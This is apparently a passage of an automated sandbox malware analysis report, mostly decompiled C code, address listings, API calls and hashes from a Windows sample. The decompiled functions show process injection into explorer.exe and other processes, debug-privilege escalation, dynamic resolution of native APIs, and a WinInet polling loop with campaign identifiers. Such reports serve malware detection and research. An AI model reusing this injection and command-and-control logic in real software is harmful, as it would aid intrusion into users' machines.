                                                                                                                                          0x00404eb7
                                                                                                                                          0x00404ebc
                                                                                                                                          0x00404ebf
                                                                                                                                          0x00404ec2
                                                                                                                                          0x00404ec9
                                                                                                                                          0x00404ed9
                                                                                                                                          0x00404ede
                                                                                                                                          0x00404ede
                                                                                                                                          0x00404ee1
                                                                                                                                          0x00404ee8
                                                                                                                                          0x00404ef2
                                                                                                                                          0x00404ef7
                                                                                                                                          0x00404ef7
                                                                                                                                          0x00404efa
                                                                                                                                          0x00404f01
                                                                                                                                          0x00404f11
                                                                                                                                          0x00404f16
                                                                                                                                          0x00404f16
                                                                                                                                          0x00404f19
                                                                                                                                          0x00404f20
                                                                                                                                          0x00404f29
                                                                                                                                          0x00404f30
                                                                                                                                          0x00404f35
                                                                                                                                          0x00404f38
                                                                                                                                          0x00404f3f
                                                                                                                                          0x00404f41
                                                                                                                                          0x00404f48
                                                                                                                                          0x00404f56
                                                                                                                                          0x00404f5b
                                                                                                                                          0x00404f5e
                                                                                                                                          0x00404f60
                                                                                                                                          0x00404f69
                                                                                                                                          0x00404f70
                                                                                                                                          0x00404f75
                                                                                                                                          0x00404f75
                                                                                                                                          0x00404f60
                                                                                                                                          0x00404f48
                                                                                                                                          0x00404f3f
                                                                                                                                          0x00404f78
                                                                                                                                          0x00404f7f
                                                                                                                                          0x00404f8f
                                                                                                                                          0x00404f94
                                                                                                                                          0x00404f94
                                                                                                                                          0x00404f9d
                                                                                                                                          0x00404fa9
                                                                                                                                          0x00404fb5
                                                                                                                                          0x00404fc1
                                                                                                                                          0x00404fc7
                                                                                                                                          0x00404fcd
                                                                                                                                          0x00404fd3
                                                                                                                                          0x00404fd5
                                                                                                                                          0x00404fe3
                                                                                                                                          0x00404fe8
                                                                                                                                          0x00404ff5
                                                                                                                                          0x00404ea7
                                                                                                                                          0x00404ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x00404eac
                                                                                                                                          0x00404e31
                                                                                                                                          0x00404e36
                                                                                                                                          0x00404e42
                                                                                                                                          0x00404e44
                                                                                                                                          0x00404e49
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e4b
                                                                                                                                          0x00404e55
                                                                                                                                          0x00404e5a
                                                                                                                                          0x00404e5d
                                                                                                                                          0x00404e5f
                                                                                                                                          0x00404eb0
                                                                                                                                          0x00404eb6
                                                                                                                                          0x00404e61
                                                                                                                                          0x00404e61
                                                                                                                                          0x00404e6a
                                                                                                                                          0x00404e6c
                                                                                                                                          0x00404e6f
                                                                                                                                          0x00404e71
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e73
                                                                                                                                          0x00404e78
                                                                                                                                          0x00404e84
                                                                                                                                          0x00404e86
                                                                                                                                          0x00404e8b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e8b
                                                                                                                                          0x00404e71
                                                                                                                                          0x00404e5f
                                                                                                                                          0x00404e49

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00404B00: InternetCrackUrlA.WININET(74B5EA30,00000000,?), ref: 00404B57
                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,74B5EA30,00000000), ref: 00404E36
                                                                                                                                            • Part of subcall function 00404B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
                                                                                                                                            • Part of subcall function 00404B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BCB
                                                                                                                                            • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404BE5
                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,?,?,?,74B5EA30,00000000), ref: 00404E78
                                                                                                                                            • Part of subcall function 00404B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0040A200,846CF300,00000000), ref: 00404C52
                                                                                                                                            • Part of subcall function 00404B00: InternetQueryOptionA.WININET(00000000,0000001F,74B5EA30,00000000), ref: 00404C8C
                                                                                                                                            • Part of subcall function 00404B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 00404CAA
                                                                                                                                            • Part of subcall function 00404B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC1
                                                                                                                                            • Part of subcall function 00404B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 00404CF3
                                                                                                                                            • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000CC8), ref: 00404D9A
                                                                                                                                            • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404D9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                                                          • String ID: 9dbcf183762872d8917b8a19535a0c65$FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$zJ@
                                                                                                                                          • API String ID: 581717041-2119261568
                                                                                                                                          • Opcode ID: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                                                          • Instruction ID: 78b4ba5b10ac8112f2c62d6eddd8c7677888aa5bfa1098f5850d3e15ab47de6f
                                                                                                                                          • Opcode Fuzzy Hash: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                                                          • Instruction Fuzzy Hash: 9351C5B1D012155BEB21EB64DC41FDB77E86B44344F0405BBE90CB32C1EB38AA94CB95
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100sleepthreadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E00408450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E00401BB0( &_v5136, 0, 0x1000);
				E00401BB0( &_v1036, 0, 0x404);
				E00401670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E00401A00( &_v1032, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x5d1314 == 0) {
						_t24 = E00407EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E004029E0( &_v1036, 0x400000, _t24,  &_v1036, 0x404,  &_v8, E00408390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t29 = E004080E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000); // executed
						_t35 = _t29;
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while(1) {
									_t30 =  *0x5d2118; // 0x0
									if(_t30 != 0) {
										goto L12;
									}
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E004029E0(_t37, 0x400000, _t39,  &_v1036, 0x404,  &_v8, E00408390); // executed
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							_t27 =  *0x5d2118; // 0x0
							if(_t27 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}























                                                                                                                                          0x00408450
                                                                                                                                          0x00408467
                                                                                                                                          0x0040847a
                                                                                                                                          0x0040848d
                                                                                                                                          0x0040849b
                                                                                                                                          0x004084ad
                                                                                                                                          0x004084b2
                                                                                                                                          0x004084b5
                                                                                                                                          0x004084b6
                                                                                                                                          0x004084b7
                                                                                                                                          0x00000000
                                                                                                                                          0x004084c0
                                                                                                                                          0x004084c7
                                                                                                                                          0x00408552
                                                                                                                                          0x00408557
                                                                                                                                          0x0040855c
                                                                                                                                          0x0040856c
                                                                                                                                          0x00408579
                                                                                                                                          0x0040857e
                                                                                                                                          0x00000000
                                                                                                                                          0x0040857e
                                                                                                                                          0x004084cd
                                                                                                                                          0x004084d8
                                                                                                                                          0x004084e5
                                                                                                                                          0x004084ea
                                                                                                                                          0x004084ec
                                                                                                                                          0x004084f1
                                                                                                                                          0x004084f7
                                                                                                                                          0x004084fb
                                                                                                                                          0x00408501
                                                                                                                                          0x00408501
                                                                                                                                          0x00408508
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040850a
                                                                                                                                          0x00408513
                                                                                                                                          0x00408546
                                                                                                                                          0x00408546
                                                                                                                                          0x00408549
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040854b
                                                                                                                                          0x0040851f
                                                                                                                                          0x0040853a
                                                                                                                                          0x0040853f
                                                                                                                                          0x00408544
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00408544
                                                                                                                                          0x00000000
                                                                                                                                          0x00408513
                                                                                                                                          0x00408501
                                                                                                                                          0x00408581
                                                                                                                                          0x00408581
                                                                                                                                          0x00408588
                                                                                                                                          0x0040859c
                                                                                                                                          0x0040859c
                                                                                                                                          0x0040858f
                                                                                                                                          0x00000000
                                                                                                                                          0x0040858f
                                                                                                                                          0x004084f1
                                                                                                                                          0x004085aa
                                                                                                                                          0x004085aa

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe, xrefs: 004084A7
                                                                                                                                          • explorer.exe, xrefs: 0040854D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentProcess$ExitSleepThread
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$explorer.exe
                                                                                                                                          • API String ID: 970816010-4081113559
                                                                                                                                          • Opcode ID: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                                                          • Instruction ID: 85ffc2236a6c84dd18c35f3841ea3bb67a2469adcd3a8cb5e8b5d398127c98f4
                                                                                                                                          • Opcode Fuzzy Hash: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                                                          • Instruction Fuzzy Hash: 02310DF5A40204B6EB10AB919E46FE7336C5714745F0400BFBF44B21D2EEB85E4986BD
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00407EF0, Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00407EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t9;
				void* _t13;
				int _t17;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t9 = CreateToolhelp32Snapshot(2, 0); // executed
				_t29 = _t9;
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300); // executed
					_t26 = _a4;
					_t13 = E00401740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						_t17 = Process32Next(_t29,  &_v300); // executed
						if(_t17 == 0) {
							L6:
							FindCloseChangeNotification(_t29); // executed
							return 0;
						} else {
							while(1) {
								_t21 = E00401740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}













                                                                                                                                          0x00407efe
                                                                                                                                          0x00407f08
                                                                                                                                          0x00407f0d
                                                                                                                                          0x00407f12
                                                                                                                                          0x00407f24
                                                                                                                                          0x00407f29
                                                                                                                                          0x00407f34
                                                                                                                                          0x00407f39
                                                                                                                                          0x00407f3e
                                                                                                                                          0x00407f85
                                                                                                                                          0x00407f86
                                                                                                                                          0x00407f97
                                                                                                                                          0x00407f40
                                                                                                                                          0x00407f48
                                                                                                                                          0x00407f4f
                                                                                                                                          0x00407f76
                                                                                                                                          0x00407f77
                                                                                                                                          0x00407f84
                                                                                                                                          0x00407f51
                                                                                                                                          0x00407f51
                                                                                                                                          0x00407f59
                                                                                                                                          0x00407f5e
                                                                                                                                          0x00407f63
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00407f74
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00407f74
                                                                                                                                          0x00000000
                                                                                                                                          0x00407f51
                                                                                                                                          0x00407f4f
                                                                                                                                          0x00407f14
                                                                                                                                          0x00407f1a
                                                                                                                                          0x00407f1a
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                                                          • Process32Next.KERNEL32 ref: 00407F48
                                                                                                                                          • Process32Next.KERNEL32 ref: 00407F6D
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4072508860-0
                                                                                                                                          • Opcode ID: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                                                          • Instruction ID: 2d56b8353110eab1b9b04cc9459ef1c3f068b5f37dea811fb5169f2e54792dba
                                                                                                                                          • Opcode Fuzzy Hash: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                                                          • Instruction Fuzzy Hash: CA11293190102967DB20A625AD41EEB73ACDF48325F0002BBFD48E21C1EB38DE5186AA
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004021A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E004021A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x5d1128; // 0x736eff60
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x5d112c;
				if((_t22 |  *0x5d112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // executed
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E004017E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E00401850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E00401D10( *0x5d1128,  *0x5d112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000); // executed
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E004022B0(_t46, E00401E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x5d1128 = _t37;
					_t38 = _t37 | _t46;
					 *0x5d112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}






















                                                                                                                                          0x004021a0
                                                                                                                                          0x004021a3
                                                                                                                                          0x004021a8
                                                                                                                                          0x004021ab
                                                                                                                                          0x004021b1
                                                                                                                                          0x004021e1
                                                                                                                                          0x004021f0
                                                                                                                                          0x004021f6
                                                                                                                                          0x004021f8
                                                                                                                                          0x004021fa
                                                                                                                                          0x00402208
                                                                                                                                          0x00402208
                                                                                                                                          0x0040220c
                                                                                                                                          0x00402213
                                                                                                                                          0x00402215
                                                                                                                                          0x00402218
                                                                                                                                          0x0040221b
                                                                                                                                          0x00402223
                                                                                                                                          0x00402226
                                                                                                                                          0x0040222a
                                                                                                                                          0x0040222e
                                                                                                                                          0x00402231
                                                                                                                                          0x00402237
                                                                                                                                          0x0040223e
                                                                                                                                          0x0040223f
                                                                                                                                          0x00402244
                                                                                                                                          0x00402247
                                                                                                                                          0x00402248
                                                                                                                                          0x00402257
                                                                                                                                          0x00402263
                                                                                                                                          0x00402266
                                                                                                                                          0x0040226b
                                                                                                                                          0x0040226e
                                                                                                                                          0x00402273
                                                                                                                                          0x0040227a
                                                                                                                                          0x00402284
                                                                                                                                          0x0040228f
                                                                                                                                          0x00402295
                                                                                                                                          0x00402297
                                                                                                                                          0x004022a9
                                                                                                                                          0x004022af
                                                                                                                                          0x00402299
                                                                                                                                          0x004022a4
                                                                                                                                          0x004022a4
                                                                                                                                          0x004021fc
                                                                                                                                          0x004021fc
                                                                                                                                          0x00402202
                                                                                                                                          0x00402202
                                                                                                                                          0x004021b3
                                                                                                                                          0x004021c4
                                                                                                                                          0x004021c9
                                                                                                                                          0x004021cc
                                                                                                                                          0x004021d1
                                                                                                                                          0x004021d3
                                                                                                                                          0x004021d9
                                                                                                                                          0x00000000
                                                                                                                                          0x004021db
                                                                                                                                          0x004021e0
                                                                                                                                          0x004021e0
                                                                                                                                          0x004021d9

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                          • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                                                          • API String ID: 2087232378-1174695804
                                                                                                                                          • Opcode ID: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                                                          • Instruction ID: 0eb8dc9d9b9cb1f38aa61a5e869cd7518be7929c4289078d347e1877a8125501
                                                                                                                                          • Opcode Fuzzy Hash: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                                                          • Instruction Fuzzy Hash: EE31A675E01605ABD710DFA5DC4179AF7B5FF88314F10816BFA08A7290D774A910DBD8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403050, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36sleepCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                          			E00403050(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
				char _v8;
				void* _t8;
				void* _t11;
				void* _t22;
				void* _t23;

				_t15 = __ecx;
				_push(__ecx);
				_t20 = _a4;
				_t3 =  &_a8; // 0x4049e6
				_t17 =  *_t3;
				_v8 = 0;
				_t8 = E00402930(__ebx, __ecx, _a4,  *_t3,  &_v8); // executed
				_t23 = _t22 + 0xc;
				if(_t8 == 0) {
					_push(__ebx);
					do {
						Sleep(0x2bc);
						_t11 = E00402930(Sleep, _t15, _t20, _t17,  &_v8);
						_t23 = _t23 + 0xc;
					} while (_t11 == 0);
				}
				return _v8;
			}








                                                                                                                                          0x00403050
                                                                                                                                          0x00403053
                                                                                                                                          0x00403055
                                                                                                                                          0x0040305c
                                                                                                                                          0x0040305c
                                                                                                                                          0x00403062
                                                                                                                                          0x00403069
                                                                                                                                          0x0040306e
                                                                                                                                          0x00403073
                                                                                                                                          0x00403075
                                                                                                                                          0x00403080
                                                                                                                                          0x00403085
                                                                                                                                          0x0040308d
                                                                                                                                          0x00403092
                                                                                                                                          0x00403095
                                                                                                                                          0x00403099
                                                                                                                                          0x004030a2

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                                                          • Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AdjustPrivilegeSleep
                                                                                                                                          • String ID: I@
                                                                                                                                          • API String ID: 2381171102-3008766272
                                                                                                                                          • Opcode ID: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                                                          • Instruction ID: ed7222478eb7be61e29de2bc31fce2cbcf9e59994bb1285db2a9842840863ed2
                                                                                                                                          • Opcode Fuzzy Hash: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                                                          • Instruction Fuzzy Hash: B1F05476501118BBDB109A86DD45E9BB7ACEB4A315F140066FD08E3142E2709F0486B5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00402930, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                          			E00402930(void* __ebx, char* __ecx, intOrPtr _a4, intOrPtr* _a12) {
				char _v5;
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t13;
				struct HINSTANCE__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_push(__ecx);
				RtlAdjustPrivilege(0x14, 1, 0,  &_v5); // executed
				if( *0x5d1314 == 0) {
					__eflags =  *0x5d1bb8;
					_push(_a4);
					if(__eflags == 0) {
						goto L4;
					} else {
						_t10 = E00405420(_t14, _t17, __eflags);
					}
					goto L5;
				} else {
					if( *0x5d1bb8 != 0) {
						__eflags =  *0x5d1318;
						if(__eflags == 0) {
							goto L9;
						} else {
							_t12 = E00405420(_t14, _t17, __eflags, _a4);
						}
						goto L10;
					} else {
						_t24 =  *0x5d1318;
						if( *0x5d1318 == 0) {
							L9:
							_push(_a4);
							_push(0xdd400);
							_push(0x4f3c38); // executed
							_t12 = E00405E60(_t14, _t17, __eflags); // executed
							L10:
							 *_a12 = _t12;
							__eflags = _t12;
							if(_t12 != 0) {
								goto L14;
							} else {
								 *0x5d1130 =  *0x5d1130 + 1;
								__eflags =  *0x5d1130;
								return _t12;
							}
						} else {
							_push(_a4);
							L4:
							_t10 = E00405B80(_t13, _t14, _t24);
							L5:
							 *_a12 = _t10;
							if(_t10 != 0) {
								L14:
								return 1;
							} else {
								return _t10;
							}
						}
					}
				}
			}








                                                                                                                                          0x00402930
                                                                                                                                          0x00402930
                                                                                                                                          0x00402933
                                                                                                                                          0x0040293e
                                                                                                                                          0x0040294b
                                                                                                                                          0x004029b5
                                                                                                                                          0x004029bc
                                                                                                                                          0x004029bf
                                                                                                                                          0x00000000
                                                                                                                                          0x004029c1
                                                                                                                                          0x004029c1
                                                                                                                                          0x004029c1
                                                                                                                                          0x00000000
                                                                                                                                          0x0040294d
                                                                                                                                          0x00402954
                                                                                                                                          0x00402977
                                                                                                                                          0x0040297e
                                                                                                                                          0x00000000
                                                                                                                                          0x00402980
                                                                                                                                          0x00402983
                                                                                                                                          0x00402988
                                                                                                                                          0x00000000
                                                                                                                                          0x00402956
                                                                                                                                          0x00402956
                                                                                                                                          0x0040295d
                                                                                                                                          0x0040298d
                                                                                                                                          0x0040298d
                                                                                                                                          0x00402990
                                                                                                                                          0x00402995
                                                                                                                                          0x0040299a
                                                                                                                                          0x004029a2
                                                                                                                                          0x004029a5
                                                                                                                                          0x004029a7
                                                                                                                                          0x004029a9
                                                                                                                                          0x00000000
                                                                                                                                          0x004029ab
                                                                                                                                          0x004029ab
                                                                                                                                          0x004029ab
                                                                                                                                          0x004029b4
                                                                                                                                          0x004029b4
                                                                                                                                          0x0040295f
                                                                                                                                          0x0040295f
                                                                                                                                          0x00402962
                                                                                                                                          0x00402962
                                                                                                                                          0x00402967
                                                                                                                                          0x0040296d
                                                                                                                                          0x00402971
                                                                                                                                          0x004029c8
                                                                                                                                          0x004029d0
                                                                                                                                          0x00402976
                                                                                                                                          0x00402976
                                                                                                                                          0x00402976
                                                                                                                                          0x00402971
                                                                                                                                          0x0040295d
                                                                                                                                          0x00402954

                                                                                                                                          APIs
                                                                                                                                          • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AdjustPrivilege
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3260937286-0
                                                                                                                                          • Opcode ID: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                                                          • Instruction ID: 506e94688713331cfc66463232599238f62637629a90eb22369aba3845a8fa88
                                                                                                                                          • Opcode Fuzzy Hash: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                                                          • Instruction Fuzzy Hash: 3811C8B0702609BBDB215F50ED0DBA63764E710349F10017BFD09352E0E7BA99D8DA9E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00407ED0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00407ED0(WCHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 == 0xffffffff || (_t3 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                                          0x00407ed6
                                                                                                                                          0x00407edf
                                                                                                                                          0x00407eef
                                                                                                                                          0x00407ee5
                                                                                                                                          0x00407eeb
                                                                                                                                          0x00407eeb

                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                                                          • Instruction ID: bc5cfff1355e279673e223a49d8db9145eaba15aaeeac5c753cdea018dd9536a
                                                                                                                                          • Opcode Fuzzy Hash: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                                                          • Instruction Fuzzy Hash: D2C0803040510C1BDF104568EC04255370CC701374F504B71FC1CD45F1D337BC924199
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 00405420, Relevance: 56.5, APIs: 27, Strings: 5, Instructions: 522nativememorysleepCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E00405420(char* __ecx, struct HINSTANCE__* __edx, void* __eflags, WCHAR* _a4) {
				CHAR* _v8;
				void _v12;
